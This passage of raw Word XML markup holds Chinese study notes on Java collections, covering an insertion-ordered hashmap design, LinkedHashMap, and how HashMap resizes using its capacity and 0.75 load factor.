      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>vector.push_back.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00364532" w:rsidRPr="00EB2023" w:rsidRDefault="00364532" w:rsidP="00364532">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="408" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>删除的时候，先</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">hashmap.find(key), </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>得到</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">value, </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>并从</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中得到</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id,  </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>把对应</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>vector</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>值置为无效。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00364532" w:rsidRPr="00EB2023" w:rsidRDefault="00364532" w:rsidP="00364532">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="408" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>更新：删除＋插入。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00364532" w:rsidRPr="00EB2023" w:rsidRDefault="00364532" w:rsidP="00364532">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="408" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>维护工作</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>了，输出的时候直接输出</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>vector</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>里面的值就可以了，</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>无效的就</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>continue</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00364532" w:rsidRPr="00EB2023" w:rsidRDefault="00364532" w:rsidP="00364532">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="408" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>算法复杂度为</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>O(n)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00364532" w:rsidRPr="00EB2023" w:rsidRDefault="00364532" w:rsidP="00364532">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="408" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法三：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00364532" w:rsidRPr="00EB2023" w:rsidRDefault="00364532" w:rsidP="00364532">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="408" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>里面有个容器</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">LinkedHashMap, </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>它能实现按照插入的顺序输出结果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00364532" w:rsidRPr="00EB2023" w:rsidRDefault="00364532" w:rsidP="00364532">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="408" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>它的原理也是维护一张表，但它是链表，并且</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hashmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中维护指向链表的指针，这样可以快速定位链表中的元素进行删除。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00364532" w:rsidRPr="00EB2023" w:rsidRDefault="00364532" w:rsidP="00364532">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="408" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>它的时间复杂度也是</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">O(n), </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>空间上要比上面少些。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00364532" w:rsidRPr="00EB2023" w:rsidRDefault="00364532" w:rsidP="00364532">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="408" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这就是我大致的想法，还有什么好办法没？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB2023" w:rsidRPr="00F41A4C" w:rsidRDefault="00EB2023" w:rsidP="00EB2023">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.1.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  HashMap</w:t>
      </w:r>
      <w:r w:rsidR="00C0322F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何进行扩容</w:t>
      </w:r>
      <w:r w:rsidR="005C57E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="00C0322F" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00364532" w:rsidRDefault="00761665" w:rsidP="008467A1">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>有两个</w:t>
      </w:r>
      <w:r w:rsidR="002E73DB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>参数影响性能：初始容量和加载因子。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E73DB" w:rsidRDefault="002E73DB" w:rsidP="008467A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>容量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是哈希表中桶的数量，初始容量只是哈希表在创建时的容量。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>加载因子</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是哈希表在其容量自动增加之前可以达到多满的一种尺度。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>当哈希表中的条目数超出了加载因子与当前容量的乘积时，则要对该哈希表进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> rehash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>操作（即重建内部数据结构），从而哈希表将具有大约两倍的桶数。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>通常，</w:t>
      </w:r>
      <w:r w:rsidRPr="002E73DB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>默认加载因子</w:t>
      </w:r>
      <w:r w:rsidRPr="002E73DB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> (.75) </w:t>
      </w:r>
      <w:r w:rsidRPr="002E73DB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在时间和空间成本上寻求一种折衷</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>加载因子过高虽然减少了空间开销，但同时也增加了查询成本（在大多数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> HashMap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>类的操作中，包括</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> get </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> put </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>操作，都反映了这一点）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
